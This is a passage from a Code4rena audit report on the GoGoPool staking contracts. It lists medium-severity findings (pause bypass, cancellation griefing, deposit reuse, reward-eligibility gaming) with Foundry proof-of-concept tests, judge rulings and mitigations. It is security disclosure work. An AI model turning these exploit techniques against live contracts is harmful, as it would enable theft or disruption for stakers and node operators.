if (nextMultisigAddressIdx==total) {
i = 0;
for (; i < total; i++) {
(addr, enabled) = getMultisig(i);
if (enabled) {
nextMultisigAddressIdx = i+1;
return addr;
revert NoEnabledMultisigFound();
emersoncloud (GoGoPool) disagreed with severity and commented:
Without a mechanism for funds to become stuck, I don’t think this warrants a medium severity.
I do agree with the principle that if we have multiple multisigs, some system to distribute minipools between them seems reasonable.
Alex the Entreprenerd (judge) commented:
While the finding will not be awarded as Admin Privilege, I believe that ultimately the Warden has shown an incorrect implementation of the function
which would ideally either offer:
- Round Robin
- Provable Random Selection
For those reasons I think the finding is still notable, in that the function doesn’t work as intended, and believe it should be judged Medium Severity.
I will be consulting with an additional Judge to ensure that the logic above is acceptable given the custom scope for this contest.
emersoncloud (GoGoPool) commented:
We’re not going to fix this in the first iteration of our protocol, we’re expecting to only have one active multisig. We will definitely implement some system to distribute minipools between multisigs when we have more.
[M-05] Bypass whenNotPaused
Submitted by __141345__, also found by HollaDieWaldfee, PaludoX0, Deivitto, ak1, cryptostellar5, Nyx, ck, ladboy233, 0xbepresent, cccz, csanuragjain, rvierdiiev, and RaymondFam
The whenNotPaused
modifier is used to pause minipool creation and staking/withdrawing GGP. However, there are several cases this modifier could be bypassed, which breaks the intended admin control function and special mode.
Proof of Concept
In paused mode, no more stakeGGP()
is allowed,
File: contract/Staking.sol
319: function stakeGGP(uint256 amount) external whenNotPaused {
320: // Transfer GGP tokens from staker to this contract
321: ggp.safeTransferFrom(msg.sender, address(this), amount);
322: _stakeGGP(msg.sender, amount);
323: }
However, restakeGGP()
is still available, which potentially violate the purpose of pause mode.
File: contract/Staking.sol
328: function restakeGGP(address stakerAddr, uint256 amount) public onlySpecificRegisteredContract("ClaimNodeOp", msg.sender) {
329: // Transfer GGP tokens from the ClaimNodeOp contract to this contract
330: ggp.safeTransferFrom(msg.sender, address(this), amount);
331: _stakeGGP(stakerAddr, amount);
332: }
In paused mode, no more withdrawGGP()
is allowed,
File: contract/Staking.sol
358: function withdrawGGP(uint256 amount) external whenNotPaused {
373: vault.withdrawToken(msg.sender, ggp, amount);
However, claimAndRestake()
is still available, which can withdraw from the vault.
File: contract/ClaimNodeOp.sol
089: function claimAndRestake(uint256 claimAmt) external {
103: if (restakeAmt > 0) {
104: vault.withdrawToken(address(this), ggp, restakeAmt);
105: ggp.approve(address(staking), restakeAmt);
106: staking.restakeGGP(msg.sender, restakeAmt);
107: }
109: if (claimAmt > 0) {
110: vault.withdrawToken(msg.sender, ggp, claimAmt);
111: }
The function spend()
can also ignore the pause mode to withdraw from the vault. But this is a guardian function. It could be intended behavior.
File: contract/ClaimProtocolDAO.sol
20: function spend(
21: string memory invoiceID,
22: address recipientAddress,
23: uint256 amount
24: ) external onlyGuardian {
32: vault.withdrawToken(recipientAddress, ggpToken, amount);
Recommended Mitigation Steps
- add the
modifier torestakeGGP()
- maybe also for guardian function
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The warden has shown an inconsistency within similar functions regarding how they behave during a pause.
Because the finding pertains to an inconsistent functionality, without a loss of principal, I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
Pause claimAndRestake as well: multisig-labs/gogopool#22
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-06] Inflation rate can be reduced by half at most if it gets called every 1.99 interval
Submitted by wagmi, also found by peritoflores, sces60107, __141345__, hansfriese, slowmoses, supernova, rvierdiiev, HollaDieWaldfee, and chaduke
When doing inflation, function getInflationAmt()
calculated number of intervals elapsed by dividing the duration with interval length.
function getInflationIntervalsElapsed() public view returns (uint256) {
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
uint256 startTime = getInflationIntervalStartTime();
if (startTime == 0) {
revert ContractHasNotBeenInitialized();
return (block.timestamp - startTime) / dao.getInflationIntervalSeconds();
As we can noticed that, this calculation is rounding down, it means if block.timestamp - startTime = 1.99 intervals
, it only account for 1 interval
However, when updating start time after inflating, it still update to current timestamp while it should only increased by intervalLength * intervalsElapsed
addUint(keccak256("RewardsPool.InflationIntervalStartTime"), inflationIntervalElapsedSeconds);
// @audit should only update to oldStartTime + inverval * numInterval
setUint(keccak256("RewardsPool.RewardsCycleTotalAmt"), newTokens);
Since default value of inflation interval = 1 days and reward cycle length = 14 days, so the impact is reduced. However, these configs can be changed in the future.
Proof of Concept
Consider the scenario:
- Assume last inflation time is
InflationIntervalStartTime = 100
.InflationIntervalSeconds = 50
. - At
timestamp = 199
, functiongetInflationAmt()
will calculate
inflationIntervalsElapsed = (199 - 100) / 50 = 1
// Compute inflation for total inflation intervals elapsed
for (uint256 i = 0; i < inflationIntervalsElapsed; i++) {
newTotalSupply = newTotalSupply.mulWadDown(inflationRate);
} // @audit only loop once.
- And then in
is still updated to current timestamp, soInflationIntervalStartTime = 199
. - If this sequence of actions are repeatedly used, we can easily see
InflationIntervalStartTime = 199, inflated count = 1
InflationIntervalStartTime = 298, inflated count = 2
InflationIntervalStartTime = 397, inflated count = 3
InflationIntervalStartTime = 496, inflated count = 4
InflationIntervalStartTime = 595, inflated count = 5
While at timestamp = 595
, inflated times should be
(595 - 100) / 50 = 9
Recommended Mitigation Steps
Consider only increasing InflationIntervalStartTime
by the amount of intervals time interval length.
emersoncloud (GoGoPool) disagreed with severity and commented:
I agree with this issue, but assets can’t be stolen, lost or compromised directly. Medium severity is more appropriate (https://docs.code4rena.com/awarding/judging-criteria#estimating-risk)
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
I have considered a Higher Severity, due to logical flaws.
However, I believe that the finding
- Relies on the Condition of being called less than intended
- Causes an incorrect amount of emissions (logically close to loss of Yield)
For those reasons, I believe Medium Severity to be the most appropriate
emersoncloud (GoGoPool) commented:
Acknowledged, not fixing in this first version of the protocol.
We can and will have rialto call startRewardsCycle if needed, and think it’s unlikely to become delayed.
[M-07] Rialto may not be able to cancel minipools created by contracts that cannot receive AVAX
Submitted by Jeiwan, also found by AkshaySrivastav, peritoflores, and ladboy233
A malicious node operator may create a minipool that cannot be cancelled.
Proof of Concept
Rialto may cancel a minipool by calling cancelMinipoolByMultisig, however the function sends AVAX to the minipool owner, and the owner may block receiving of AVAX, causing the call to cancelMinipoolByMultisig
to fail (MinipoolManager.sol#L664):
function _cancelMinipoolAndReturnFunds(address nodeID, int256 index) private {
address owner = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".owner")));
The following PoC demonstrates how calls to cancelMinipoolByMultisig
can be blocked:
function testCancelMinipoolByMultisigDOS_AUDIT() public {
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint128 ggpStakeAmt = 200 ether;
// Node operator is a contract than cannot receive AVAX:
// contract NodeOpContract {}
NodeOpContract nodeOpContract = new NodeOpContract();
dealGGP(address(nodeOpContract), ggpStakeAmt);
vm.deal(address(nodeOpContract), depositAmt);
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
bytes32 errorCode = "INVALID_NODEID";
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
store.setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
// Rialto trices to cancel the minipool created by the node operator contract but the transaction reverts since
// the node operator contract cannot receive AVAX.
// FAIL: reverted with ETH_TRANSFER_FAILED
minipoolMgr.cancelMinipoolByMultisig(mp1.nodeID, errorCode);
Recommended Mitigation Steps
Consider using the Pull over Push pattern to return AVAX to owners of minipools that are canceled by Rialto.
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The warden has shown how the checked return value from call can be used as a grief to prevent canceling of a minipool.
The finding can have different severities based on the context, in this case, the cancelling can be denied, however, other state transitions are still possible.
For this reason (functionality is denied), I agree with Medium Severity.
emersoncloud (GoGoPool) commented:
We’ll make a note of this in our documentation, but not fixing immediately.
[M-08] Recreated pools receive a wrong AVAX amount due to miscalculated compounded liquid staker amount
Submitted by Jeiwan, also found by yixxas, Franfran, and 0xbepresent
After recreation, minipools will receive more AVAX than the sum of their owners’ current stake and the rewards that they generated.
Proof of Concept
Multipools that successfully finished validation may be recreated by multisigs, before staked GGP and deposited AVAX have been withdrawn by minipool owners (MinipoolManager.sol#L444). The function compounds deposited AVAX by adding the rewards earned during previous validation periods to the AVAX amounts deposited and requested from stakers (MinipoolManager.sol#L450-L452):
Minipool memory mp = getMinipool(minipoolIndex);
// Compound the avax plus rewards
// NOTE Assumes a 1:1 nodeOp:liqStaker funds ratio
uint256 compoundedAvaxNodeOpAmt = mp.avaxNodeOpAmt + mp.avaxNodeOpRewardAmt;
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), compoundedAvaxNodeOpAmt);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), compoundedAvaxNodeOpAmt);
The function assumes that a node operator and liquid stakers earned an equal reward amount: compoundedAvaxNodeOpAmt
is calculated as the sum of the current AVAX deposit of the minipool owner and the node operator reward earned so far. However, liquid stakers get a smaller reward than node operators: the minipool node commission fee is applied to their share (MinipoolManager.sol#L417):
uint256 avaxHalfRewards = avaxTotalRewardAmt / 2;
// Node operators recv an additional commission fee
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
uint256 avaxLiquidStakerRewardAmt = avaxHalfRewards - avaxHalfRewards.mulWadDown(dao.getMinipoolNodeCommissionFeePct());
uint256 avaxNodeOpRewardAmt = avaxTotalRewardAmt - avaxLiquidStakerRewardAmt;
As a result, the avaxLiquidStakerAmt
set in the recreateMinipool
function will always be bigger than the actual amount since it equals to the compounded node operator amount, which includes node operator rewards.
Next, in the recreateMinipool
function, the assigned AVAX amount is increased by the amount borrowed from liquid stakers + the node operator amount, which is again wrong because the assigned AVAX amount can only be increased by the liquid stakers’ reward share (MinipoolManager.sol#L457-L459):
staking.increaseAVAXStake(mp.owner, mp.avaxNodeOpRewardAmt);
staking.increaseAVAXAssigned(mp.owner, compoundedAvaxNodeOpAmt);
As a result, the amount of AVAX borrowed from liquid stakers by the minipool will be increased by the minipool node commission fee, the increased amount will be sent to the validator, and it will be required to end the validation period.
The following PoC demonstrates the wrong calculation:
// test/unit/MinipoolManager.t.sol
function testRecreateMinipoolWrongLiquidStakerReward_AUDIT() public {
uint256 duration = 4 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
// Enough to start but not to re-stake, we will add more later
uint128 ggpStakeAmt = 100 ether;
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp.nodeID, txID, block.timestamp);
skip(duration / 2);
// Give rialto the rewards it needs
uint256 rewards = 10 ether;
deal(address(rialto), address(rialto).balance + rewards);
// Pay out the rewards
minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(mp.nodeID, block.timestamp, rewards);
MinipoolManager.Minipool memory mpAfterEnd = minipoolMgr.getMinipoolByNodeID(mp.nodeID);
assertEq(mpAfterEnd.avaxNodeOpAmt, depositAmt);
assertEq(mpAfterEnd.avaxLiquidStakerAmt, avaxAssignmentRequest);
// After the validation periods has ended, the node operator and liquid stakers got different rewards,
// since a fee was taken from the liquid stakers' share.
uint256 nodeOpReward = 5.75 ether;
uint256 liquidStakerReward = 4.25 ether;
assertEq(mpAfterEnd.avaxNodeOpRewardAmt, nodeOpReward);
assertEq(mpAfterEnd.avaxLiquidStakerRewardAmt, liquidStakerReward);
// Add a bit more collateral to cover the compounding rewards
staking.stakeGGP(1 ether);
MinipoolManager.Minipool memory mpCompounded = minipoolMgr.getMinipoolByNodeID(mp.nodeID);
// After pool was recreated, node operator's amounts were increased correctly.
assertEq(mpCompounded.avaxNodeOpAmt, mp.avaxNodeOpAmt + nodeOpReward);
assertEq(mpCompounded.avaxNodeOpAmt, mp.avaxNodeOpInitialAmt + nodeOpReward);
assertEq(staking.getAVAXStake(mp.owner), mp.avaxNodeOpAmt + nodeOpReward);
// However, liquid stakers' amount were increased incorrectly: nodeOpReward was added instead of liquidStakerReward.
// These assertions will fail:
// expected: 1004.25 ether, actual 1005.75 ether
assertEq(mpCompounded.avaxLiquidStakerAmt, mp.avaxLiquidStakerAmt + liquidStakerReward);
assertEq(staking.getAVAXAssigned(mp.owner), mp.avaxLiquidStakerAmt + liquidStakerReward);
Recommended Mitigation Steps
When compounding rewards in the recreateMinipool
function, consider using an average reward so that node operator’s and liquid stakers’ deposits are increased equally and the entire reward amount is used:
--- a/contracts/contract/MinipoolManager.sol
+++ b/contracts/contract/MinipoolManager.sol
@@ -443,18 +443,22 @@ contract MinipoolManager is Base, ReentrancyGuard, IWithdrawer {
/// @param nodeID 20-byte Avalanche node ID
function recreateMinipool(address nodeID) external whenNotPaused {
int256 minipoolIndex = onlyValidMultisig(nodeID);
requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
Minipool memory mp = getMinipool(minipoolIndex);
// Compound the avax plus rewards
// NOTE Assumes a 1:1 nodeOp:liqStaker funds ratio
- uint256 compoundedAvaxNodeOpAmt = mp.avaxNodeOpAmt + mp.avaxNodeOpRewardAmt;
+ uint256 nodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt")));
+ uint256 liquidStakerRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerRewardAmt")));
+ uint256 avgRewardAmt = (nodeOpRewardAmt + liquidStakerRewardAmt) / 2;
+ uint256 compoundedAvaxNodeOpAmt = mp.avaxNodeOpAmt + avgRewardAmt;
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), compoundedAvaxNodeOpAmt);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), compoundedAvaxNodeOpAmt);
Staking staking = Staking(getContractAddress("Staking"));
// Only increase AVAX stake by rewards amount we are compounding
// since AVAX stake is only decreased by withdrawMinipool()
- staking.increaseAVAXStake(mp.owner, mp.avaxNodeOpRewardAmt);
+ staking.increaseAVAXStake(mp.owner, avgRewardAmt);
staking.increaseAVAXAssigned(mp.owner, compoundedAvaxNodeOpAmt);
Also, consider sending equal amounts of rewards to the vault and the ggAVAX token in the recordStakingEnd
emersoncloud (GoGoPool) disagreed with severity and commented:
I need to do a bit more digging on my end, but this might be working as designed. Will come back to it.
I think this is valid - don’t think it is high though as there isn’t really a loss of funds.
0xju1ie (GoGoPool) disputed and commented:
Talked to the rest of the team and this is not valid - it is working as designed. We are matching 1:1 with what the node operators are earning/staking.
Alex the Entreprenerd (judge) commented:
Will flag to triage but I agree with the sponsor.
The math is as follows:
-> Principal Deposited
-> Earned Rewards (both for Operator and Stakers)
-> Re-assing all -> Assigned amount has grown “too much” but in reality it’s the correct value
-> When withdrawing, the operator only get’s their portion of AVAX, meaning that the assigned as grown more, but they don’t get an anomalous amount of rewards
@Alex the Entreprenerd & @0xju1ie - Could you please expand on why it’s okay? There are multiple issues arising from this:
- This function may return false while there is the correct amount of AVAX as
(in extreme cases)- This is going to pull too much funds from the
: https://github.com/code-423n4/2022-12-gogopool/blob/1c30b320b7105e57c92232408bc795b6d2dfa208/contracts/contract/MinipoolManager.sol#L329- This will fake the “high water” value: https://github.com/code-423n4/2022-12-gogopool/blob/1c30b320b7105e57c92232408bc795b6d2dfa208/contracts/contract/MinipoolManager.sol#L371
- As there is a strict equality and that not all rewards may be sent by Rialto (only those really yielded by the validation), the staking end may never be triggered: https://github.com/code-423n4/2022-12-gogopool/blob/1c30b320b7105e57c92232408bc795b6d2dfa208/contracts/contract/MinipoolManager.sol#L399-L403, same for the
emersoncloud (GoGoPool) commented:
@Franfran - I can chime in here.
When recreating a minipool, we intend to allow Node Operators to compound their staking rewards for the next cycle.
Say that a minipool with 2000 AVAX was running. After one cycle the minipool was rewarded 20 AVAX. 15 AVAX goes to Node Operators and 5 AVAX to Liquid Stakers (in this example).
When we recreate the minipool we want to allow the Node Operator to run a minipool with 1015 AVAX. Right now we require a 1:1 match of Node Operator to Liquid Staker funds, so that means we’ll withdraw 1015 AVAX from the Liquid Staking pool. That’s 10 AVAX more than we deposited from this one minipool. We are relying on there being 10 free floating AVAX in the Liquid Staking fund to recreate this minipool.
The Warden says “The function assumes that a node operator and liquid stakers earned an equal reward amount”. We’re were not assuming that, but we are assuming that there will be some free AVAX in the Liquid Staker pool to withdraw more than we’ve just deposited from rewards.
All that being said, we do not like this assumption and will change to use
instead ofavaxNodeOpAmt
for both. Ensuring that we will always have enough Liquid Staker AVAX to recreate the minipool and we will maintain the one-to-one match.
Alex the Entreprenerd (judge) set severity to Medium and commented:
The warden has shown a potential risk when it comes to accounting, fees and the requirement on liquid funds, more specifically the accounting in storage will use the values earned by the validator, however when recreating new funds will need to be pulled.
The discrepancy may cause issues.
I believe this report has shown a potential risk, but I also think the Warden should have spent more time explaining it in depth vs stopping at the potential invariant being broken.
I’m flagging this out of caution after considering scrapping it / inviting the Wardens to follow up in mitigation review.
@emersoncloud -
The Warden says “The function assumes that a node operator and liquid stakers earned an equal reward amount”. We’re were not assuming that
As can be seen from the linked code snippet (the comments, specifically):
// Compound the avax plus rewards // NOTE Assumes a 1:1 nodeOp:liqStaker funds ratio uint256 compoundedAvaxNodeOpAmt = mp.avaxNodeOpAmt + mp.avaxNodeOpRewardAmt;
The assumption is that the 1:1 funds ratio is preserved after rewards have been accounted. This can only be true when the reward amounts are equal, which is violated due to the fees applied to
.@Alex the Entreprenerd - I’m sorry for not providing more details on how this can affect the entire system. Yes, my assumption was that extra staker funds would be required to recreate a pool, and there might be not enough funds staked (and deeper accounting may be affected, as pointed out by @Franfran), while the earned rewards + the previous staked amounts would be enough to recreate a pool.
Thus, the mitigation that uses
for both amounts looks good to me, since, out of the two amounts, the smaller one will always be picked, which won’t require pulling extra funds from stakers. The difference between this mitigation and the mitigation suggested in the report, is that the latter uses the full reward amount in a recreated pool, while usingavaxLiquidStakerAmt
for both amounts leaves a portion of the reward idle.I also agree with the medium severity, the High Risk label was probably a misclick.
emersoncloud (GoGoPool) mitigated:
Use liquid staker avax amount instead of node op amount: multisig-labs/gogopool#43
Status: Mitigation not confirmed. Full details in report from RaymondFam, and also included in Mitigation Review section below.
[M-09] State Transition: Minipools can be created using other operator’s AVAX deposit via recreateMinipool
Submitted by hansfriese, also found by bin2chen, 0xdeadbeef0x, Aymen0909, datapunk, Allarious, RaymondFam, adriro, peritoflores, wagmi, Jeiwan, SmartSek, betweenETHlines, immeas, Franfran, Nyx, Ch_301, 0xdeadbeef0x, HollaDieWaldfee, RaymondFam, cccz, 0Kage, and kaliberpoziomka8552
This issue is related to state transition of Minipools.
According to the implementation, the possible states and transitions are as below.
The Rialto may call recreateMinipool
when the minipool is in states of Withdrawable, Finished, Error, Canceled
The problem is that these four states are not the same in the sense of holding the node operator’s AVAX.
If the state flow has followed Prelaunch->Launched->Staking->Error
, all the AVAX are still in the vault.
If the state flow has followed Prelaunch->Launched->Staking->Error->Finished
(last transition by withdrawMinipoolFunds
), all the AVAX are sent back to the node operator.
So if the Rialto calls recreateMinipool
for the second case, there are no AVAX deposited from the node operator at that point but there can be AVAX from other mini pools in the state of Prelaunch.
Because there are AVAX in the vault (and these are not managed per staker base), recreatePool
results in a new mini pool in Prelaunch
state and it is further possible to go through the normal flow Prelaunch->Launched->Staking->Withdrawable->Finished
And the other minipool that was waiting for launch will not be able to launch because the vault is lack of AVAX.
Below is a test case written to show an example.
function testAudit() public {
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 200 ether;
// Node Op 1
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(
// Node Op 2
address nodeOp2 = getActorWithTokens("nodeOp2", MAX_AMT, MAX_AMT);
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp2 = createMinipool(
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{ value: MAX_AMT }();
// Node Op 1: Prelaunch->Launched
bytes32 txID = keccak256("txid");
// Node Op 1: Launched->Staking
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
// Node Op 1: Staking->Error
bytes32 errorCode = "INVALID_NODEID";
minipoolMgr.recordStakingError{ value: validationAmt }(mp1.nodeID, errorCode);
// There are 2*depositAmt AVAX in the pool manager
assertEq(vault.balanceOf("MinipoolManager"), depositAmt * 2);
// Node Op 1: Staking->Finished withdrawing funds
assertEq(staking.getAVAXStake(nodeOp), 0);
mp1 = minipoolMgr.getMinipool(minipoolIndex);
assertEq(mp1.status, uint256(MinipoolStatus.Finished));
// Rialto recreate a minipool for the mp1
// Node Op 1: Finished -> Prelaunch
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
// Node Op 1: Prelaunch -> Launched
// Node Op 1: Launched -> Staking
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
assertEq(staking.getAVAXStake(nodeOp), 0);
assertEq(staking.getAVAXAssigned(nodeOp), depositAmt);
assertEq(staking.getAVAXAssignedHighWater(nodeOp), depositAmt);
// now try to launch the second operator's pool, it will fail with InsufficientContractBalance
Tools Used
Manual Review, Foundry
Recommended Mitigation Steps
Make sure to keep the node operator’s deposit status the same for all states that can lead to the same state.
For example, for all states that can transition to Prelaunch, make sure to send the AVAX back to the user and get them back on the call recreateMiniPool()
emersoncloud (GoGoPool) confirmed
I think #213 might be a better primary. This one primarily depends on minipools going to staking->error which wouldn’t actually happen unless Rialto made a mistake.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
The Warden has shown an issue with the FSM, Pools are allowed to perform the following transition
which allows to spin up the pool without funds.This could only happen if Rialto performs a mistake, so the finding is limited to highlighting the issue with the State Transition.
For this reason, I believe Medium to be the most appropriate severity.
@Alex the Entreprenerd - Please note that the issue is not limited to Rialto doing a mistake, but it’s actually possible to trick it by frontrunning the Rialto transaction as outlined in my finding: #484 (comment)
That’s why the high severity was chosen initially.
emersoncloud (GoGoPool) mitigated:
Atomically recreate minipool so a node operator can’t withdraw inbetween: multisig-labs/gogopool#23
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-10] Functions cancelMinipool()
doesn’t reset the value of the RewardsStartTime
for user when user’s minipoolcount
is zero
Submitted by unforgiven, also found by caventa and rvierdiiev
The value of RewardsStartTime
shows when node runner started the minipool and validation rewards are generated by node runner. it is used to see if node runners are eligible for ggp rewards or not and node runners should run their node for minimum amount of time during the rewarding cycle to be eligible for rewards. but right now node runner can create a mimipool and cancel it (after waiting time) and even so the minipool generated no rewards and cancelled the value of RewardsStartTime
won’t get reset for node runner and in the end of the cycle node runner would be eligible for rewards (node runner can create another minipool near the end of cycle). so this issue would cause wrong reward distribution between node runners and code doesn’t correctly track RewardsStartTime
for node runners and malicious node runners can use this issue and receive rewards without running validation nodes for the minimum amount of required time.
Proof of Concept
This is cancelMinipool()
and _cancelMinipoolAndReturnFunds()
function cancelMinipool(address nodeID) external nonReentrant {
Staking staking = Staking(getContractAddress("Staking"));
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
int256 index = requireValidMinipool(nodeID);
// make sure they meet the wait period requirement
if (block.timestamp - staking.getRewardsStartTime(msg.sender) < dao.getMinipoolCancelMoratoriumSeconds()) {
revert CancellationTooEarly();
_cancelMinipoolAndReturnFunds(nodeID, index);
function _cancelMinipoolAndReturnFunds(address nodeID, int256 index) private {
requireValidStateTransition(index, MinipoolStatus.Canceled);
setUint(keccak256(abi.encodePacked("minipool.item", index, ".status")), uint256(MinipoolStatus.Canceled));
address owner = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".owner")));
uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxNodeOpAmt")));
uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
Staking staking = Staking(getContractAddress("Staking"));
staking.decreaseAVAXStake(owner, avaxNodeOpAmt);
staking.decreaseAVAXAssigned(owner, avaxLiquidStakerAmt);
emit MinipoolStatusChanged(nodeID, MinipoolStatus.Canceled);
Vault vault = Vault(getContractAddress("Vault"));
As you can see there is no check that user’s minipool count is zero and if it is to reset the value of RewardsStartTime
for user so if a user creates a minipool in the start of the cycle and then cancel it after 5 days and wait for end of the cycle and start another minipool and increase his staking AVAX he would be eligible for ggp rewards (ClaimNodeOp.isEligible()
would return true
for that user even so the user didn’t run node for the required amount of time in the cycle). these are the steps to exploit this:
- node runner would create a minipool near start time of the ggp rewarding cycle and the value of
would set for node runner. - after 5 days that node runner’s minipool has not been launched by multisig (for any reason) node runner would call
and code would cancel his minipool but won’t resetRewardsStartTime
for node runner. - after 20 days and near end of the gpp reward cycle node runner would create another minipool and start running node.
- in the end even so node runner only start running node and earning reward near end of the reward cycle but code would count node runner as eligible for rewards because
for node runner shows wrong value.
This bug would cause rewards to be distributed wrongly between node runners and malicious node runners can bypass required time for running nodes during reward cycle to be eligible for rewards.
Tools Used
Recommended Mitigation Steps
Set the value of RewardsStartTime
based on successfully finished minipools or when minipool is launched and user can’t cancel minipool.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
The Warden has shown how, due to
not resettingrewardsStartTime
a pool owner could receive rewards for time in which they did not have any activePool.Because this is contingent on the Multisig not cancelling the pool and because it would limit the attack to rewards, I believe Medium Severity to be the most appropriate.
emersoncloud (GoGoPool) mitigated:
Reset rewards start time in cancel minipool: multisig-labs/gogopool#51
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-11] MultisigManager may not be able to add a valid Multisig
Submitted by bin2chen, also found by immeas, RaymondFam, ast3ros, cryptonue, 0xhunter, adriro, 0xbepresent, and Saintcode_
When more than 10 mulitsig, it is impossible to modify or delete the old ones, making it impossible to create new valid ones.
Proof of Concept
MultisigManager limits the number of Multisig to 10, which cannot be deleted or replaced after they have been disabled.
This will have a problem, if the subsequent use of 10, all 10 for some reason, be disabled.
Then it is impossible to add new ones and replace the old ones, so you have to continue using the old Multisig at risk.
function registerMultisig(address addr) external onlyGuardian {
int256 multisigIndex = getIndexOf(addr);
if (multisigIndex != -1) {
revert MultisigAlreadyRegistered();
uint256 index = getUint(keccak256("multisig.count"));
if (index >= MULTISIG_LIMIT) {
revert MultisigLimitReached(); //***@audit limt 10, and no other way to delete or replace the old Multisig ***//
Recommended Mitigation Steps
Add replace old mulitsig method
function replaceMultisig(address addr,address oldAddr) external onlyGuardian {
int256 multisigIndex = getIndexOf(oldAddr);
if (multisigIndex == -1) {
revert MultisigNotFound();
setAddress(keccak256(abi.encodePacked("multisig.item", multisigIndex, ".address")), addr);
emit RegisteredMultisig(addr, msg.sender);
emersoncloud (GoGoPool) confirmed
0xju1ie (GoGoPool) disagreed with severity and commented:
I’d argue Low since its unlikely.
emersoncloud (GoGoPool) commented:
I disagree @0xju1ie. I think it’s an oversight not to have a way to delete old multisigs with the limit in place rather than a quality assurance issue.
#349 has an interesting fix for this issue
emersoncloud (GoGoPool) commented:
Which was: “Count only the validated/enabled multisigs in order to control the limit.”
Alex the Entreprenerd (judge) commented:
The Warden has shown how, due to a logic flaw, the system can only ever add up to 10 multi sigs, even after disabling all, no more multi sigs could be added.
Because this shows how an external condition can break the functionality of the MultisigManager, I agree with Medium Severity.
emersoncloud (GoGoPool) commented:
Not fixing right now, we don’t foresee having many multisigs at launch, and will upgrade as necessary to support more.
[M-12] Cancellation of minipool may skip MinipoolCancelMoratoriumSeconds
checking if it was cancelled before
Submitted by caventa, also found by wagmi, __141345__, hansfriese, unforgiven, Franfran, betweenETHlines, Allarious, stealthyz, mert_eren, and 0xdeadbeef0x
When canceling a minipool that was canceled before, it may skip MinipoolCancelMoratoriumSeconds
checking and allow the user to cancel the minipool immediately.
Proof of Concept
A user may create a minipool.
/// @notice Accept AVAX deposit from node operator to create a Minipool. Node Operator must be staking GGP. Open to public.
/// @param nodeID 20-byte Avalanche node ID
/// @param duration Requested validation period in seconds
/// @param delegationFee Percentage delegation fee in units of ether (2% is 0.2 ether)
/// @param avaxAssignmentRequest Amount of requested AVAX to be matched for this Minipool
function createMinipool(
address nodeID,
uint256 duration,
uint256 delegationFee,
uint256 avaxAssignmentRequest
) external payable whenNotPaused {
if (nodeID == address(0)) {
revert InvalidNodeID();
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
if (
// Current rule is matched funds must be 1:1 nodeOp:LiqStaker
msg.value != avaxAssignmentRequest ||
avaxAssignmentRequest > dao.getMinipoolMaxAVAXAssignment() ||
avaxAssignmentRequest < dao.getMinipoolMinAVAXAssignment()
) {
revert InvalidAVAXAssignmentRequest();
if (msg.value + avaxAssignmentRequest < dao.getMinipoolMinAVAXStakingAmt()) {
revert InsufficientAVAXForMinipoolCreation();
Staking staking = Staking(getContractAddress("Staking"));
staking.increaseAVAXStake(msg.sender, msg.value);
staking.increaseAVAXAssigned(msg.sender, avaxAssignmentRequest);
if (staking.getRewardsStartTime(msg.sender) == 0) {
staking.setRewardsStartTime(msg.sender, block.timestamp);
